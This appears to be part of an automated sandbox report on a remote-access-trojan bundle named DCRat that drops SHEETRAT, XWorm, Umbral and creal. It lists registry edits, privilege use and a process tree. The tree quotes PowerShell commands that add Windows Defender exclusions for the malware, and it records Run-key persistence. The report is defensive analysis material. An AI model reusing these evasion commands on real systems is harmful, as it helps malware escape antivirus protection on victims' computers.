description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\NodeSlot = "1" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Applications\7zFM.exe\shell rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_Classes\Local Settings rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Applications\7zFM.exe\shell\open\command rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Applications\7zFM.exe rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = ffffffff rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = ffffffff rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\NodeSlot = "2" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Applications\7zFM.exe\shell\open rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 4c00310000000000cb58e7b81000372d5a697000380008000400efbecb58e7b8cb58e7b82a0000000103010000000200000000000000000000000000000037002d005a0069007000000014000000 rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000 rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 8800310000000000cb58b1bd110050524f4752417e310000700008000400efbeee3a851acb58b1bd2a0000003c000000000001000000000000000000460000000000500072006f006700720061006d002000460069006c0065007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370038003100000018000000 rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Applications rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\Applications\7zFM.exe\shell\open\command\ = "\"C:\\Program Files\\7-Zip\\7zFM.exe\" \"%1\"" rundll32.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2288 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2320 ComponentcrtSvc.exe 1712 Umbral.exe 2736 powershell.exe 1956 powershell.exe 1668 powershell.exe 2780 powershell.exe 1304 powershell.exe 2532 powershell.exe 2816 powershell.exe 1964 powershell.exe 1476 powershell.exe 2296 powershell.exe 2288 powershell.exe 2248 powershell.exe 2344 powershell.exe 948 powershell.exe 3068 powershell.exe 992 powershell.exe 2324 powershell.exe 2388 powershell.exe 840 powershell.exe 2792 powershell.exe 2932 taskmgr.exe 2932 taskmgr.exe 2680 powershell.exe 2932 taskmgr.exe 2040 powershell.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 3020 audiodg.exe 2932 taskmgr.exe 3020 audiodg.exe 3020 audiodg.exe 3020 audiodg.exe 3020 audiodg.exe 3020 audiodg.exe 3020 audiodg.exe 3020 audiodg.exe 3020 audiodg.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 2760 rundll32.exe 320 7zFM.exe 2932 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 2740 7zFM.exe Token: 35 2740 7zFM.exe Token: SeSecurityPrivilege 2740 7zFM.exe Token: SeRestorePrivilege 320 7zFM.exe Token: 35 320 7zFM.exe Token: SeDebugPrivilege 572 XWorm.exe Token: SeDebugPrivilege 1712 Umbral.exe Token: SeDebugPrivilege 2320 ComponentcrtSvc.exe Token: SeIncreaseQuotaPrivilege 308 wmic.exe Token: SeSecurityPrivilege 308 wmic.exe Token: SeTakeOwnershipPrivilege 308 wmic.exe Token: SeLoadDriverPrivilege 308 wmic.exe Token: SeSystemProfilePrivilege 308 wmic.exe Token: SeSystemtimePrivilege 308 wmic.exe Token: SeProfSingleProcessPrivilege 308 wmic.exe Token: SeIncBasePriorityPrivilege 308 wmic.exe Token: SeCreatePagefilePrivilege 308 wmic.exe Token: SeBackupPrivilege 308 wmic.exe Token: SeRestorePrivilege 308 wmic.exe Token: SeShutdownPrivilege 308 wmic.exe Token: SeDebugPrivilege 308 wmic.exe Token: SeSystemEnvironmentPrivilege 308 wmic.exe Token: SeRemoteShutdownPrivilege 308 wmic.exe Token: SeUndockPrivilege 308 wmic.exe Token: SeManageVolumePrivilege 308 wmic.exe Token: 33 308 wmic.exe Token: 34 308 wmic.exe Token: 35 308 wmic.exe Token: SeIncreaseQuotaPrivilege 308 wmic.exe Token: SeSecurityPrivilege 308 wmic.exe Token: SeTakeOwnershipPrivilege 308 wmic.exe Token: SeLoadDriverPrivilege 308 wmic.exe Token: SeSystemProfilePrivilege 308 wmic.exe Token: SeSystemtimePrivilege 308 wmic.exe Token: SeProfSingleProcessPrivilege 308 wmic.exe Token: SeIncBasePriorityPrivilege 308 wmic.exe Token: SeCreatePagefilePrivilege 308 wmic.exe Token: SeBackupPrivilege 308 wmic.exe Token: SeRestorePrivilege 308 wmic.exe Token: SeShutdownPrivilege 308 wmic.exe Token: SeDebugPrivilege 308 wmic.exe Token: SeSystemEnvironmentPrivilege 308 wmic.exe Token: SeRemoteShutdownPrivilege 308 wmic.exe Token: SeUndockPrivilege 308 wmic.exe Token: SeManageVolumePrivilege 308 wmic.exe Token: 33 308 wmic.exe Token: 34 308 wmic.exe Token: 35 308 wmic.exe Token: SeDebugPrivilege 1900 tasklist.exe Token: SeDebugPrivilege 2736 powershell.exe Token: SeDebugPrivilege 1956 powershell.exe Token: SeDebugPrivilege 1668 powershell.exe Token: SeDebugPrivilege 2780 powershell.exe Token: SeDebugPrivilege 1304 powershell.exe Token: SeDebugPrivilege 2532 powershell.exe Token: SeDebugPrivilege 2816 powershell.exe Token: SeDebugPrivilege 1964 powershell.exe Token: SeDebugPrivilege 1476 powershell.exe Token: SeDebugPrivilege 2296 powershell.exe Token: SeDebugPrivilege 2288 powershell.exe Token: SeDebugPrivilege 2248 powershell.exe Token: SeDebugPrivilege 2344 powershell.exe Token: SeDebugPrivilege 948 powershell.exe Token: SeDebugPrivilege 3068 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2740 7zFM.exe 2740 7zFM.exe 320 7zFM.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe 2932 taskmgr.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2760 rundll32.exe 2760 rundll32.exe 2760 rundll32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2032 wrote to memory of 2760 2032 cmd.exe 29 PID 2032 wrote to memory of 2760 2032 cmd.exe 29 PID 2032 wrote to memory of 2760 2032 cmd.exe 29 PID 2760 wrote to memory of 2740 2760 rundll32.exe 30 PID 2760 wrote to memory of 2740 2760 rundll32.exe 30 PID 2760 wrote to memory of 2740 2760 rundll32.exe 30 PID 788 wrote to memory of 2248 788 DCRat.exe 35 PID 788 wrote to memory of 2248 788 DCRat.exe 35 PID 788 wrote to memory of 2248 788 DCRat.exe 35 PID 788 wrote to memory of 2248 788 DCRat.exe 35 PID 788 wrote to memory of 572 788 DCRat.exe 36 PID 788 wrote to memory of 572 788 DCRat.exe 36 PID 788 wrote to memory of 572 788 DCRat.exe 36 PID 788 wrote to memory of 572 788 DCRat.exe 36 PID 788 wrote to memory of 2076 788 DCRat.exe 37 PID 788 wrote to memory of 2076 788 DCRat.exe 37 PID 788 wrote to memory of 2076 788 DCRat.exe 37 PID 788 wrote to memory of 2076 788 DCRat.exe 37 PID 2076 wrote to memory of 1124 2076 DCRat.exe 38 PID 2076 wrote to memory of 1124 2076 DCRat.exe 38 PID 2076 wrote to memory of 1124 2076 DCRat.exe 38 PID 2076 wrote to memory of 1124 2076 DCRat.exe 38 PID 788 wrote to memory of 1336 788 DCRat.exe 39 PID 788 wrote to memory of 1336 788 DCRat.exe 39 PID 788 wrote to memory of 1336 788 DCRat.exe 39 PID 788 wrote to memory of 1336 788 DCRat.exe 39 PID 788 wrote to memory of 1712 788 DCRat.exe 41 PID 788 wrote to memory of 1712 788 DCRat.exe 41 PID 788 wrote to memory of 1712 788 DCRat.exe 41 PID 788 wrote to memory of 1712 788 DCRat.exe 41 PID 1336 wrote to memory of 1860 1336 creal.exe 42 PID 1336 wrote to memory of 1860 1336 creal.exe 42 PID 1336 wrote to memory of 1860 1336 creal.exe 42 PID 1336 wrote to memory of 1860 1336 creal.exe 42 PID 1124 wrote to memory of 3020 1124 WScript.exe 155 PID 1124 wrote to memory of 3020 1124 WScript.exe 155 PID 1124 wrote to memory of 3020 1124 WScript.exe 155 PID 1124 wrote to memory of 3020 1124 WScript.exe 155 PID 3020 wrote to memory of 2320 3020 cmd.exe 45 PID 3020 wrote to memory of 2320 3020 cmd.exe 45 PID 3020 wrote to memory of 2320 3020 cmd.exe 45 PID 3020 wrote to memory of 2320 3020 cmd.exe 45 PID 1712 wrote to memory of 308 1712 Umbral.exe 46 PID 1712 wrote to memory of 308 1712 Umbral.exe 46 PID 1712 wrote to memory of 308 1712 Umbral.exe 46 PID 1712 wrote to memory of 1608 1712 Umbral.exe 53 PID 1712 wrote to memory of 1608 1712 Umbral.exe 53 PID 1712 wrote to memory of 1608 1712 Umbral.exe 53 PID 1712 wrote to memory of 2736 1712 Umbral.exe 60 PID 1712 wrote to memory of 2736 1712 Umbral.exe 60 PID 1712 wrote to memory of 2736 1712 Umbral.exe 60 PID 1860 wrote to memory of 2820 1860 creal.exe 63 PID 1860 wrote to memory of 2820 1860 creal.exe 63 PID 1860 wrote to memory of 2820 1860 creal.exe 63 PID 1860 wrote to memory of 2820 1860 creal.exe 63 PID 2820 wrote to memory of 1900 2820 cmd.exe 67 PID 2820 wrote to memory of 1900 2820 cmd.exe 67 PID 2820 wrote to memory of 1900 2820 cmd.exe 67 PID 2820 wrote to memory of 1900 2820 cmd.exe 67 PID 1712 wrote to memory of 1956 1712 Umbral.exe 82 PID 1712 wrote to memory of 1956 1712 Umbral.exe 82 PID 1712 wrote to memory of 1956 1712 Umbral.exe 82 PID 572 wrote to memory of 1668 572 XWorm.exe 84 PID 572 wrote to memory of 1668 572 XWorm.exe 84 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1608 attrib.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\DCRat by C3lestial.fun.rar"1⤵
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\DCRat by C3lestial.fun.rar2⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\DCRat by C3lestial.fun.rar"3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2740
-
-
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Desktop\DCRat by C3lestial.fun\DCRat.exe"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:320
-
C:\Users\Admin\Desktop\DCRat by C3lestial.fun\DCRat.exe"C:\Users\Admin\Desktop\DCRat by C3lestial.fun\DCRat.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:788 -
C:\Users\Admin\AppData\Local\Temp\SHEETRAT.exe"C:\Users\Admin\AppData\Local\Temp\SHEETRAT.exe"2⤵
- Executes dropped EXE
PID:2248
-
-
C:\Users\Admin\AppData\Local\Temp\XWorm.exe"C:\Users\Admin\AppData\Local\Temp\XWorm.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:572 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1668
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XWorm.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2780
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\update.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1304
-
-
